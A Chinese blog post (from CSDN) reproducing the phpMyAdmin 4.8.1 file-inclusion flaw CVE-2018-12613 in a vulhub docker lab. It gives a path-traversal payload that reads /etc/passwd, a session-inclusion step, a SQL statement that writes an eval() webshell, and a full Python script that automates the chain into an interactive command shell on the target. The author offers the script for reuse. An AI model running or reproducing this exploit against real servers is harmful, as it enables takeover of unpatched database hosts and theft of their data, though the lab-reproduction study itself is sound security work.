[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现

最新推荐文章于 2023-12-10 19:55:45 发布
最新推荐文章于 2023-12-10 19:55:45 发布
阅读量577 收藏 1
点赞数 5
分类专栏: vulhub 漏洞复现 网络安全 文章标签: 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fightte/article/details/117605708
版权

[网络安全任重道远]
~
题目有点长
~
是这样的。这是vulhub的复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG
~
vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有
phpmyadmin ----- 是网页版的数据库管理工具,
CVE编号是 ----- CVE-2018-12613,
其漏洞有 ----- 文件包含和远程命令执行,
~

过程

漏洞具体原因可参考:
https://www.cnblogs.com/leixiao-/p/10265150.html
这篇文章
这里直接演示,就是文件包含:
~
打开放在服务器上的vulhub

在这里插入图片描述找到:
在这里插入图片描述进入:
在这里插入图片描述

自动编译环境:

docker-compose build

启动环境并查看端口

docker-compose up -d
docker ps   //查看进程信息

在这里插入图片描述然后访问服务器的8080端口就行了:
在这里插入图片描述

开始测试

payload:

https://www.xxx.com?target=db_datadict.php%253f/../../../../../../../etc/passwd

成功:
在这里插入图片描述尝试在新建查询,执行如下语句:

SELECT '<?=phpinfo()?>';

在这里插入图片描述然后查询cookie中的session值,在网页中进行包含,从而实现命令执行:
在这里插入图片描述得到seesion,在网址栏使用语句:

?target=db_sql.php%253f/../../../../../../../../tmp/sess_+查到的session

成功命令执行,得到phpinfo:
在这里插入图片描述既然可以命令执行,那么可以用file_get_contents函数往上面写码,然后连shell:

SELECT "<?=file_put_contents('1.php','<?php eval(@$_POST[a]); ?>')?>";

然后通过seesion访问其1.php所在位置就行了,就能进行连接了:
~
用python脚本来进行RCE,也可以一直用:


#========================== by F1ght_UwU =========================================================

import re
import requests

#手动得到的session,内存中有
session_1 = 'your_session_use_your_F12_TO_FIND'#需要及时更改


url_import = 'http://your_server/import.php'
url_session = 'http://your_server/index.php?target=db_sql.php?/../../../../../../../tmp/sess_'+session_1
url_testpage= 'http://your_server/F1ght.php'

cmd = '''SELECT "<?=file_put_contents('F1ght.php','<?php eval(@$_POST[fun]); ?>')?>";'''

#定义两个headers
headers_1 = {
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
	'Accept':'*/*',
	'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
}

headers_2 = {
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
	'Accept':'*/*',
	'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
	'X-Requested-With':'XMLHttpRequest',
	'Content-Length':'108',
	'Origin':'http://your_server:your_port',
	'Connection':'close',
	'Cookie':'phpMyAdmin='+session_1+'; pma_lang=zh_CN; ',
	'Pragma':'no-cache',
	'Cache-Control':'no-cache',
}

r = requests.get(url_session,headers = headers_1)
#print(r.text)
pattern = re.compile('s:16:"(.+)";br')
result = pattern.findall(r.text)
#print(result[0])
token = result[0]

data = 'token='+token+'&sql_query='+cmd+'&ajax_request=true'


r = requests.post(url_import,data = data,headers = headers_2)
r = requests.get(url_session,headers = headers_1)
r = requests.get(url_testpage)

#if r.status_code == 200:
	#while 1:
	#print('Success')


def check_status(url):
	r=requests.get(url)
	return r.status_code #尝试状态


def RCE():
	cmd = str(input(':'))
	payload_cmd = {
			'fun':'system("'+cmd+'");' #尝试传入payload来进行命令执行
	}
	#print(payload_cmd)
	r = requests.post(url_testpage,headers=headers_2,data = payload_cmd) 
	print(r.text)
    


if __name__ == '__main__':

	if check_status(url_testpage) == 200:
		while 1:
			print('Success, please input your command')
			RCE()
	else:
		print('sorry, unable to enter this webpage, advice to check your session in your code')
		exit()

记得更改your_sever,和session,改成自己的:
~
执行效果:
在这里插入图片描述

F1gh4
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9321
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
渗透测试之利用docker实现CVE-2018-12613复现
LKmnbZ's Blog
11-08 352
利用phpmyadmin相关的点 尝试使用docker去复现 https://github.com/vulhub/vulhub 1. Installation Install the docker/docker-compose on Ubuntu 16.04: # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | p...
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码可远程执行.
phpmyadmin漏洞_方兴未艾第3期 | phpMyAdmin文件包含漏洞
weixin_39884144的博客
11-30 179
phpMyAdmin文件包含漏洞Created 2020-07-22|Updated 2020-07-2201前言1.1CVE-2018-12613(phpMyAdmin文件包含漏洞)phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含漏洞,通过二次编码即可绕过检查1.2文件包含漏洞文件包含漏洞分为 本地文件包含(LFI) 和 ...
phpMyAdmin另一种getshell姿势(CVE-2018-12613)
weixin_43263451的博客
04-17 2522
我知道phpmyadmin的getshell大概有日志写马和select into outfile两种姿势,最近又新学了一种getshell姿势,赶紧记录一下 思路大概就是我们执行的sql语句会被记录到你的session文件中去,那我们就可以写马到自己的session文件,然后利用远程文件包含漏洞(CVE-2018-12613),导致可以getshell 漏洞复现 环境: phpmyadmin4.8.1 php 7.2.5 登入后查询select “<?php phpinfo();?>”; [
红队攻防实战之phpmyadmin-RCE集锦
最新发布
众生度尽,方证菩提
12-10 911
世界上只有一种真正的英雄主义,那就是认清了生活的真相后,仍然热爱她
总结分析 | 基于phpmyadmin的渗透测试
小司机的奥拓
09-22 1937
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
[Vulhub](CVE-2018-12613phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 922
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
文件包含知识学习总结
qq_64222098的博客
03-19 200
本地文件包含漏洞(LFI):只能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者可以控制的,所以一般攻击者都是包含一些固定的系统配置文件,从而去读取系统敏感信息。程序员一般会把重复使用的函数写入文件中,在需要使用某个函数时直接调用这个文件,这种文件的调用过程一般称为文件包含。在该目录下的web.xml文件中有某个文件的相关的映射的话,可以直接在页面访问这个文件,类似于文件包含。如果程序没有对文件的来源进行严格的审查,客户端就可以传入包含恶意代码的文件,导致文件包含漏洞。用来接收POST数据。
phpmyadmin
04-02
phpmyadmin
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 818
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
phpstudy_2016-2018_rce 漏洞复现及深度利用
m0_67189356的博客
04-16 4591
说明 内容 漏洞编号 phpstudy_2016-2018_rce 漏洞名称 RCE(Remote Command|Code Execute) 漏洞评级 高危 影响范围 phpStudy 2016 phpStudy 2018 漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 漏洞描述 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code E
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2666
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2369
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
vulhub-phpmyadmin
bqnagus
10-02 333
vulhub-phpmyadmin复现
简述burp和wireshark的简易抓包过程
fightte的博客
01-26 7903
抓包 (虽然很多人会,但可看看) 是什么 抓包(packet capture)就是将网络传输发送与接收的数据包进行截获、重发、编辑、转存等操作,也用来检查网络安全。抓包也经常被用来进行数据截取等。 (摘自:百度百科) 作用 通过对网络上传输的数据进行抓取,可以对其进行分析,对于软件的Debug很大的帮助。当然也可以通过抓取用户发送的涉及用户名和密码的数据包来获取用户的密码。 (1)网络通讯的真实内容 (2)网络故障分析 (3)程序网络接口分析 (4)木马通讯数据内容 在web方面的题目中作用颇多。 ~~指出
mysql中phpmyadmin安装教程_phpmyadmin安装教程及配置设置
05-30
以下是在Ubuntu操作系统上安装和配置phpMyAdmin的步骤: 1. 首先安装phpMyAdmin和Apache: ``` sudo apt-get update sudo apt-get install phpmyadmin apache2 ``` 2. 安装过程中,系统会提示你选择web服务器,选择apache2,然后再选择yes。 3. 安装完成后,打开Apache2的配置文件,输入以下命令: ``` sudo nano /etc/apache2/apache2.conf ``` 4. 在文件的末尾添加以下代码: ``` Include /etc/phpmyadmin/apache.conf ``` 5. 保存并关闭文件,重启Apache2: ``` sudo systemctl restart apache2 ``` 6. 现在你可以通过访问http://localhost/phpmyadmin来访问phpMyAdmin了。 7. 如果你无法访问phpMyAdmin,可以检查Apache2的错误日志,它会告诉你问题所在: ``` sudo tail -f /var/log/apache2/error.log ``` 8. 如果你需要更改phpMyAdmin的配置,请打开以下文件: ``` sudo nano /etc/phpmyadmin/config.inc.php ``` 9. 在这个文件中,你可以更改phpMyAdmin的设置,例如默认语言、默认主题等等。 以上就是在Ubuntu上安装和配置phpMyAdmin的所有步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值